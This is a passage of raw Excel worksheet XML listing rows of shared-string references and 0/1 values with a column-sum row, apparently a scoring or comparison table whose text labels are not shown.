        <v>1123</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>1123</v>
      </c>
      <c r="D74">
        <v>1</v>
      </c>
      <c r="E74">
        <v>1</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>1262</v>
      </c>
      <c r="G74">
        <v>1</v>
      </c>
      <c r="H74">
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A75" s="3" t="s">
        <v>1808</v>
      </c>
      <c r="B75" s="3" t="s">
        <v>1809</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>1810</v>
      </c>
      <c r="D75">
        <v>1</v>
      </c>
      <c r="E75">
        <v>1</v>
      </c>
      <c r="F75" s="3" t="s">
        <v>1868</v>
      </c>
      <c r="G75" s="19">
        <v>1</v>
      </c>
      <c r="H75" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A76" s="3" t="s">
        <v>1811</v>
      </c>
      <c r="B76" s="3" t="s">
        <v>1812</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>1813</v>
      </c>
      <c r="D76">
        <v>1</v>
      </c>
      <c r="E76">
        <v>1</v>
      </c>
      <c r="F76" s="3" t="s">
        <v>1744</v>
      </c>
      <c r="G76" s="19">
        <v>1</v>
      </c>
      <c r="H76" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A77" s="3" t="s">
        <v>1556</v>
      </c>
      <c r="B77" s="3" t="s">
        <v>1557</v>
      </c>
      <c r="C77" s="3" t="s">
        <v>1558</v>
      </c>
      <c r="D77">
        <v>1</v>
      </c>
      <c r="E77">
        <v>1</v>
      </c>
      <c r="F77" s="3" t="s">
        <v>1580</v>
      </c>
      <c r="G77" s="19">
        <v>1</v>
      </c>
      <c r="H77" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A78" s="3" t="s">
        <v>1814</v>
      </c>
      <c r="B78" s="3" t="s">
        <v>1815</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>1816</v>
      </c>
      <c r="D78">
        <v>1</v>
      </c>
      <c r="E78">
        <v>1</v>
      </c>
      <c r="F78" s="3" t="s">
        <v>1869</v>
      </c>
      <c r="G78" s="19">
        <v>1</v>
      </c>
      <c r="H78" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="79" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A79" s="3" t="s">
        <v>1817</v>
      </c>
      <c r="B79" s="3" t="s">
        <v>1818</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>1819</v>
      </c>
      <c r="D79">
        <v>1</v>
      </c>
      <c r="E79">
        <v>1</v>
      </c>
      <c r="F79" s="3" t="s">
        <v>1870</v>
      </c>
      <c r="G79" s="19">
        <v>1</v>
      </c>
      <c r="H79" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A80" s="3" t="s">
        <v>1820</v>
      </c>
      <c r="B80" s="3" t="s">
        <v>1821</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>1822</v>
      </c>
      <c r="D80">
        <v>1</v>
      </c>
      <c r="E80">
        <v>1</v>
      </c>
      <c r="F80" s="3" t="s">
        <v>1871</v>
      </c>
      <c r="G80" s="19">
        <v>1</v>
      </c>
      <c r="H80" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A81" s="3"/>
      <c r="B81" s="3" t="s">
        <v>1888</v>
      </c>
      <c r="C81" s="3"/>
      <c r="D81" s="19">
        <v>0</v>
      </c>
      <c r="E81" s="19">
        <v>0</v>
      </c>
      <c r="F81" s="3" t="s">
        <v>1888</v>
      </c>
      <c r="G81" s="19">
        <v>1</v>
      </c>
      <c r="H81" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A82" s="3" t="s">
        <v>1823</v>
      </c>
      <c r="B82" s="3" t="s">
        <v>1887</v>
      </c>
      <c r="C82" s="3" t="s">
        <v>1887</v>
      </c>
      <c r="D82">
        <v>1</v>
      </c>
      <c r="E82">
        <v>1</v>
      </c>
      <c r="F82" s="3" t="s">
        <v>1887</v>
      </c>
      <c r="G82" s="19">
        <v>1</v>
      </c>
      <c r="H82" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="83" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A83" s="3"/>
      <c r="B83" s="3" t="s">
        <v>1889</v>
      </c>
      <c r="C83" s="3" t="s">
        <v>1889</v>
      </c>
      <c r="D83" s="19">
        <v>1</v>
      </c>
      <c r="E83" s="19">
        <v>1</v>
      </c>
      <c r="F83" s="3" t="s">
        <v>1889</v>
      </c>
      <c r="G83" s="19">
        <v>1</v>
      </c>
      <c r="H83" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A84" s="3"/>
      <c r="B84" s="3" t="s">
        <v>1890</v>
      </c>
      <c r="C84" s="3" t="s">
        <v>1890</v>
      </c>
      <c r="D84" s="19">
        <v>1</v>
      </c>
      <c r="E84" s="19">
        <v>1</v>
      </c>
      <c r="F84" s="3" t="s">
        <v>1890</v>
      </c>
      <c r="G84" s="19">
        <v>1</v>
      </c>
      <c r="H84" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="85" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A85" s="3" t="s">
        <v>1824</v>
      </c>
      <c r="B85" s="3" t="s">
        <v>1891</v>
      </c>
      <c r="C85" s="3" t="s">
        <v>1891</v>
      </c>
      <c r="D85" s="19">
        <v>1</v>
      </c>
      <c r="E85" s="19">
        <v>1</v>
      </c>
      <c r="F85" s="3" t="s">
        <v>1891</v>
      </c>
      <c r="G85" s="19">
        <v>1</v>
      </c>
      <c r="H85" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A86" s="3" t="s">
        <v>1825</v>
      </c>
      <c r="B86" s="3" t="s">
        <v>1826</v>
      </c>
      <c r="C86" s="3" t="s">
        <v>1826</v>
      </c>
      <c r="D86" s="19">
        <v>1</v>
      </c>
      <c r="E86" s="19">
        <v>1</v>
      </c>
      <c r="F86" s="3" t="s">
        <v>1872</v>
      </c>
      <c r="G86" s="19">
        <v>1</v>
      </c>
      <c r="H86" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="87" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A87" s="3"/>
      <c r="B87" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="C87" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="D87" s="19">
        <v>1</v>
      </c>
      <c r="E87" s="19">
        <v>1</v>
      </c>
      <c r="F87" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="G87" s="19">
        <v>1</v>
      </c>
      <c r="H87" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="88" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A88" s="3"/>
      <c r="B88" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="C88" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="D88" s="19">
        <v>1</v>
      </c>
      <c r="E88" s="19">
        <v>1</v>
      </c>
      <c r="F88" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="G88" s="19">
        <v>1</v>
      </c>
      <c r="H88" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="89" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A89" s="3" t="s">
        <v>1827</v>
      </c>
      <c r="B89" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C89" s="3" t="s">
        <v>63</v>
      </c>
      <c r="D89" s="19">
        <v>1</v>
      </c>
      <c r="E89" s="19">
        <v>1</v>
      </c>
      <c r="F89" s="3" t="s">
        <v>63</v>
      </c>
      <c r="G89" s="19">
        <v>1</v>
      </c>
      <c r="H89" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="90" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A90" s="3" t="s">
        <v>1828</v>
      </c>
      <c r="B90" s="3" t="s">
        <v>1829</v>
      </c>
      <c r="C90" s="3" t="s">
        <v>1829</v>
      </c>
      <c r="D90">
        <v>1</v>
      </c>
      <c r="E90">
        <v>1</v>
      </c>
      <c r="F90" s="3" t="s">
        <v>1873</v>
      </c>
      <c r="G90">
        <v>1</v>
      </c>
      <c r="H90">
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A91" s="3" t="s">
        <v>1830</v>
      </c>
      <c r="B91" s="3" t="s">
        <v>1831</v>
      </c>
      <c r="C91" s="3" t="s">
        <v>1832</v>
      </c>
      <c r="D91">
        <v>1</v>
      </c>
      <c r="E91">
        <v>1</v>
      </c>
      <c r="F91" s="3" t="s">
        <v>1874</v>
      </c>
      <c r="G91">
        <v>1</v>
      </c>
      <c r="H91">
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A92" s="3"/>
      <c r="B92" s="3" t="s">
        <v>1893</v>
      </c>
      <c r="C92" s="3" t="s">
        <v>1893</v>
      </c>
      <c r="D92" s="19">
        <v>1</v>
      </c>
      <c r="E92" s="19">
        <v>1</v>
      </c>
      <c r="F92" s="3" t="s">
        <v>1893</v>
      </c>
      <c r="G92" s="19">
        <v>1</v>
      </c>
      <c r="H92" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="93" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A93" s="3" t="s">
        <v>1833</v>
      </c>
      <c r="B93" s="3" t="s">
        <v>1892</v>
      </c>
      <c r="C93" s="3" t="s">
        <v>1892</v>
      </c>
      <c r="D93" s="19">
        <v>1</v>
      </c>
      <c r="E93" s="19">
        <v>1</v>
      </c>
      <c r="F93" s="3" t="s">
        <v>1892</v>
      </c>
      <c r="G93" s="19">
        <v>1</v>
      </c>
      <c r="H93" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="94" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A94" s="3" t="s">
        <v>1834</v>
      </c>
      <c r="B94" s="3" t="s">
        <v>1835</v>
      </c>
      <c r="C94" s="3" t="s">
        <v>1836</v>
      </c>
      <c r="D94" s="19">
        <v>1</v>
      </c>
      <c r="E94" s="19">
        <v>1</v>
      </c>
      <c r="F94" s="3" t="s">
        <v>1875</v>
      </c>
      <c r="G94" s="19">
        <v>1</v>
      </c>
      <c r="H94" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A95" s="3" t="s">
        <v>1837</v>
      </c>
      <c r="B95" s="3" t="s">
        <v>1838</v>
      </c>
      <c r="C95" s="3" t="s">
        <v>1838</v>
      </c>
      <c r="D95">
        <v>1</v>
      </c>
      <c r="E95">
        <v>1</v>
      </c>
      <c r="F95" s="3" t="s">
        <v>1876</v>
      </c>
      <c r="G95">
        <v>1</v>
      </c>
      <c r="H95">
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A96" s="3" t="s">
        <v>1839</v>
      </c>
      <c r="B96" s="3" t="s">
        <v>1840</v>
      </c>
      <c r="C96" s="3" t="s">
        <v>1841</v>
      </c>
      <c r="D96" s="19">
        <v>1</v>
      </c>
      <c r="E96" s="19">
        <v>1</v>
      </c>
      <c r="F96" s="3" t="s">
        <v>1877</v>
      </c>
      <c r="G96" s="19">
        <v>1</v>
      </c>
      <c r="H96" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="97" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A97" s="3" t="s">
        <v>1842</v>
      </c>
      <c r="B97" s="3" t="s">
        <v>1843</v>
      </c>
      <c r="C97" s="3" t="s">
        <v>1843</v>
      </c>
      <c r="D97" s="19">
        <v>1</v>
      </c>
      <c r="E97" s="19">
        <v>1</v>
      </c>
      <c r="F97" s="3" t="s">
        <v>1878</v>
      </c>
      <c r="G97" s="19">
        <v>1</v>
      </c>
      <c r="H97" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A98" s="3" t="s">
        <v>1844</v>
      </c>
      <c r="B98" s="3" t="s">
        <v>1845</v>
      </c>
      <c r="C98" s="3" t="s">
        <v>1846</v>
      </c>
      <c r="D98">
        <v>1</v>
      </c>
      <c r="E98">
        <v>1</v>
      </c>
      <c r="F98" s="3" t="s">
        <v>1879</v>
      </c>
      <c r="G98">
        <v>1</v>
      </c>
      <c r="H98">
        <v>1</v>
      </c>
    </row>
    <row r="99" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A99" s="3" t="s">
        <v>1847</v>
      </c>
      <c r="B99" s="3" t="s">
        <v>1818</v>
      </c>
      <c r="C99" s="3" t="s">
        <v>1819</v>
      </c>
      <c r="D99">
        <v>1</v>
      </c>
      <c r="E99">
        <v>1</v>
      </c>
      <c r="F99" s="3" t="s">
        <v>1870</v>
      </c>
      <c r="G99" s="19">
        <v>1</v>
      </c>
      <c r="H99" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="100" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A100" s="3" t="s">
        <v>1848</v>
      </c>
      <c r="B100" s="3" t="s">
        <v>1849</v>
      </c>
      <c r="C100" s="3" t="s">
        <v>1850</v>
      </c>
      <c r="D100">
        <v>1</v>
      </c>
      <c r="E100">
        <v>1</v>
      </c>
      <c r="F100" s="3" t="s">
        <v>1880</v>
      </c>
      <c r="G100" s="19">
        <v>1</v>
      </c>
      <c r="H100" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A101" s="3" t="s">
        <v>1851</v>
      </c>
      <c r="B101" s="3" t="s">
        <v>1852</v>
      </c>
      <c r="C101" s="3" t="s">
        <v>1853</v>
      </c>
      <c r="D101">
        <v>1</v>
      </c>
      <c r="E101">
        <v>1</v>
      </c>
      <c r="F101" s="3" t="s">
        <v>1881</v>
      </c>
      <c r="G101" s="19">
        <v>1</v>
      </c>
      <c r="H101" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="102" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A102" s="3" t="s">
        <v>1854</v>
      </c>
      <c r="B102" s="3" t="s">
        <v>1855</v>
      </c>
      <c r="C102" s="3" t="s">
        <v>1856</v>
      </c>
      <c r="D102">
        <v>1</v>
      </c>
      <c r="E102">
        <v>1</v>
      </c>
      <c r="F102" s="3" t="s">
        <v>1882</v>
      </c>
      <c r="G102" s="19">
        <v>1</v>
      </c>
      <c r="H102" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A103" s="3" t="s">
        <v>1857</v>
      </c>
      <c r="B103" s="3" t="s">
        <v>1858</v>
      </c>
      <c r="C103" s="3" t="s">
        <v>1858</v>
      </c>
      <c r="D103">
        <v>1</v>
      </c>
      <c r="E103">
        <v>1</v>
      </c>
      <c r="F103" s="3" t="s">
        <v>1883</v>
      </c>
      <c r="G103">
        <v>1</v>
      </c>
      <c r="H103">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A104" s="3" t="s">
        <v>1859</v>
      </c>
      <c r="B104" s="3" t="s">
        <v>1860</v>
      </c>
      <c r="C104" s="9" t="s">
        <v>1934</v>
      </c>
      <c r="D104">
        <v>0</v>
      </c>
      <c r="E104">
        <v>0</v>
      </c>
      <c r="F104" s="3" t="s">
        <v>1933</v>
      </c>
      <c r="G104">
        <v>0</v>
      </c>
      <c r="H104">
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A105" s="3" t="s">
        <v>1053</v>
      </c>
      <c r="B105" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C105" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D105">
        <v>1</v>
      </c>
      <c r="E105">
        <v>1</v>
      </c>
      <c r="F105" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G105">
        <v>1</v>
      </c>
      <c r="H105">
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A106" s="3" t="s">
        <v>1861</v>
      </c>
      <c r="B106" s="3" t="s">
        <v>1862</v>
      </c>
      <c r="C106" s="3" t="s">
        <v>1863</v>
      </c>
      <c r="D106">
        <v>1</v>
      </c>
      <c r="E106">
        <v>1</v>
      </c>
      <c r="F106" s="3" t="s">
        <v>1884</v>
      </c>
      <c r="G106" s="19">
        <v>1</v>
      </c>
      <c r="H106" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A107" s="3" t="s">
        <v>1289</v>
      </c>
      <c r="B107" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="C107" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="D107">
        <v>1</v>
      </c>
      <c r="E107">
        <v>1</v>
      </c>
      <c r="F107" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="G107" s="19">
        <v>1</v>
      </c>
      <c r="H107" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="108" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A108" s="3" t="s">
        <v>1864</v>
      </c>
      <c r="B108" s="3" t="s">
        <v>72</v>
      </c>
      <c r="C108" s="9" t="s">
        <v>1935</v>
      </c>
      <c r="D108" s="19">
        <v>0</v>
      </c>
      <c r="E108" s="19">
        <v>0</v>
      </c>
      <c r="F108" s="3" t="s">
        <v>1129</v>
      </c>
      <c r="G108" s="19">
        <v>1</v>
      </c>
      <c r="H108" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A109" s="3" t="s">
        <v>1056</v>
      </c>
      <c r="B109" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C109" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D109" s="19">
        <v>1</v>
      </c>
      <c r="E109" s="19">
        <v>1</v>
      </c>
      <c r="F109" s="3" t="s">
        <v>73</v>
      </c>
      <c r="G109" s="19">
        <v>1</v>
      </c>
      <c r="H109" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="110" spans="1:8" ht="165.6" x14ac:dyDescent="0.25">
      <c r="A110" s="3" t="s">
        <v>1865</v>
      </c>
      <c r="B110" s="3" t="s">
        <v>1866</v>
      </c>
      <c r="C110" s="3" t="s">
        <v>1867</v>
      </c>
      <c r="D110" s="19">
        <v>1</v>
      </c>
      <c r="E110" s="19">
        <v>1</v>
      </c>
      <c r="F110" s="3" t="s">
        <v>1885</v>
      </c>
      <c r="G110" s="19">
        <v>1</v>
      </c>
      <c r="H110" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="111" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A111" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D111" s="6">
        <f>SUM(D66:D110)</f>
        <v>42</v>
      </c>
      <c r="E111" s="6">
        <f t="shared" ref="E111:H111" si="1">SUM(E66:E110)</f>
        <v>40</v>
      </c>
      <c r="F111" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G111" s="6">
        <f t="shared" si="1"/>
        <v>44</v>
      </c>
      <c r="H111" s="6">
        <f t="shared" si="1"/>
        <v>40</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A64:H6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26FAE-91B4-4AAC-BE97-5B4018C867C2}">
  <dimension ref="A1:H62"/>
  <sheetViews>
    <sheetView topLeftCell="A22" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="J49" sqref="J49"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="25.33203125" style="13" customWidth="1"/>
    <col min="2" max="2" width="24.77734375" style="13" customWidth="1"/>
    <col min="3" max="3" width="16.33203125" style="13" customWidth="1"/>
    <col min="4" max="4" width="10.44140625" style="13" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="10.6640625" style="13" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="17.77734375" style="13" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" style="13" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="22.6640625" style="13" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="28.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>128</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ht="81" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A4" s="11" t="s">
        <v>129</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>146</v>
      </c>
      <c r="D4" s="12">
        <v>0</v>
      </c>
      <c r="E4" s="12">
        <v>0</v>
      </c>
      <c r="F4" s="12" t="s">
        <v>24</v>
      </c>
      <c r="G4" s="12">
        <v>1</v>
      </c>
      <c r="H4" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="11" t="s">
        <v>130</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>26</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>26</v>
      </c>
      <c r="D5" s="12">
        <v>1</v>
      </c>
      <c r="E5" s="12">
        <v>1</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>26</v>
      </c>
      <c r="G5" s="12">
        <v>1</v>
      </c>
      <c r="H5" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="13.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A6" s="11" t="s">
        <v>131</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>147</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>147</v>
      </c>
      <c r="D6" s="12">
        <v>1</v>
      </c>
      <c r="E6" s="12">
        <v>1</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G6" s="12">
        <v>1</v>
      </c>
      <c r="H6" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="13.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A7" s="11" t="s">
        <v>132</v>
      </c>
      <c r="B7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="D7" s="12">
        <v>1</v>
      </c>
      <c r="E7" s="12">
        <v>1</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>27</v>
      </c>
      <c r="G7" s="12">
        <v>1</v>
      </c>
      <c r="H7" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A8" s="11" t="s">
        <v>150</v>
      </c>
      <c r="B8" s="12" t="s">
        <v>148</v>
      </c>
      <c r="C8" s="12" t="s">
        <v>148</v>
      </c>
      <c r="D8" s="12">
        <v>1</v>
      </c>
      <c r="E8" s="12">
        <v>1</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>148</v>
      </c>
      <c r="G8" s="12">
        <v>1</v>
      </c>
      <c r="H8" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="11" t="s">
        <v>133</v>
      </c>
      <c r="B9" s="12" t="s">
        <v>149</v>
      </c>
      <c r="C9" s="12" t="s">
        <v>149</v>
      </c>
      <c r="D9" s="12">
        <v>1</v>
      </c>
      <c r="E9" s="12">
        <v>1</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>149</v>
      </c>
      <c r="G9" s="12">
        <v>1</v>
      </c>
      <c r="H9" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A10" s="11" t="s">
        <v>134</v>
      </c>
      <c r="E10" s="12"/>
      <c r="G10" s="12"/>
      <c r="H10" s="12"/>
    </row>
    <row r="11" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A11" s="11" t="s">
        <v>12</v>
      </c>
      <c r="B11" s="12" t="s">
        <v>29</v>
      </c>
      <c r="C11" s="12" t="s">
        <v>31</v>
      </c>
      <c r="D11" s="12">
        <v>1</v>
      </c>
      <c r="E11" s="12">
        <v>1</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>31</v>
      </c>
      <c r="G11" s="12">
        <v>1</v>
      </c>
      <c r="H11" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12" s="11" t="s">
        <v>135</v>
      </c>
      <c r="B12" s="12" t="s">
        <v>151</v>
      </c>
      <c r="C12" s="12" t="s">
        <v>1897</v>
      </c>
      <c r="D12" s="12">
        <v>1</v>
      </c>
      <c r="E12" s="12">
        <v>1</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>151</v>
      </c>
      <c r="G12" s="12">
        <v>1</v>
      </c>
      <c r="H12" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A13" s="11" t="s">
        <v>136</v>
      </c>
      <c r="B13" s="12" t="s">
        <v>152</v>
      </c>
      <c r="C13" s="12" t="s">
        <v>152</v>
      </c>
      <c r="D13" s="12">
        <v>1</v>
      </c>
      <c r="E13" s="12">
        <v>1</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>152</v>
      </c>
      <c r="G13" s="12">
        <v>1</v>
      </c>
      <c r="H13" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="11" t="s">
        <v>82</v>
      </c>
      <c r="B14" s="12" t="s">
        <v>36</v>
      </c>
      <c r="C14" s="12" t="s">
        <v>38</v>
      </c>
      <c r="D14" s="12">
        <v>1</v>
      </c>
      <c r="E14" s="12">
        <v>1</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>36</v>
      </c>
      <c r="G14" s="12">
        <v>1</v>
      </c>
      <c r="H14" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A15" s="11" t="s">
        <v>83</v>
      </c>
      <c r="B15" s="12" t="s">
        <v>112</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>113</v>
      </c>
      <c r="D15" s="12">
        <v>1</v>
      </c>
      <c r="E15" s="12">
        <v>1</v>
      </c>
      <c r="F15" s="12" t="s">
        <v>112</v>
      </c>
      <c r="G15" s="12">
        <v>1</v>
      </c>
      <c r="H15" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A16" s="11" t="s">
        <v>84</v>
      </c>
      <c r="B16" s="12" t="s">
        <v>114</v>
      </c>
      <c r="C16" s="12" t="s">
        <v>115</v>
      </c>
      <c r="D16" s="12">
        <v>1</v>
      </c>
      <c r="E16" s="12">
        <v>0</v>
      </c>
      <c r="F16" s="12" t="s">
        <v>116</v>
      </c>
      <c r="G16" s="12">
        <v>0</v>
      </c>
      <c r="H16" s="12">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="26.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A17" s="11" t="s">
        <v>137</v>
      </c>
      <c r="B17" s="12" t="s">
        <v>153</v>
      </c>
      <c r="C17" s="12" t="s">
        <v>153</v>
      </c>
      <c r="D17" s="12">
        <v>1</v>
      </c>
      <c r="E17" s="12">
        <v>1</v>
      </c>
      <c r="F17" s="12" t="s">
        <v>153</v>
      </c>
      <c r="G17" s="12">
        <v>1</v>
      </c>
      <c r="H17" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A18" s="11" t="s">
        <v>138</v>
      </c>
      <c r="B18" s="12" t="s">
        <v>154</v>
      </c>
      <c r="C18" s="12" t="s">
        <v>154</v>
      </c>
      <c r="D18" s="12">
        <v>1</v>
      </c>
      <c r="E18" s="12">
        <v>1</v>
      </c>
      <c r="F18" s="12" t="s">
        <v>154</v>
      </c>
      <c r="G18" s="12">
        <v>1</v>
      </c>
      <c r="H18" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A19" s="11" t="s">
        <v>136</v>
      </c>
      <c r="B19" s="12" t="s">
        <v>152</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>152</v>
      </c>
      <c r="D19" s="12">
        <v>1</v>
      </c>
      <c r="E19" s="12">
        <v>1</v>
      </c>
      <c r="F19" s="12" t="s">
        <v>152</v>
      </c>
      <c r="G19" s="12">
        <v>1</v>
      </c>
      <c r="H19" s="12">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="11" t="s">
        <v>17</v>
      </c>
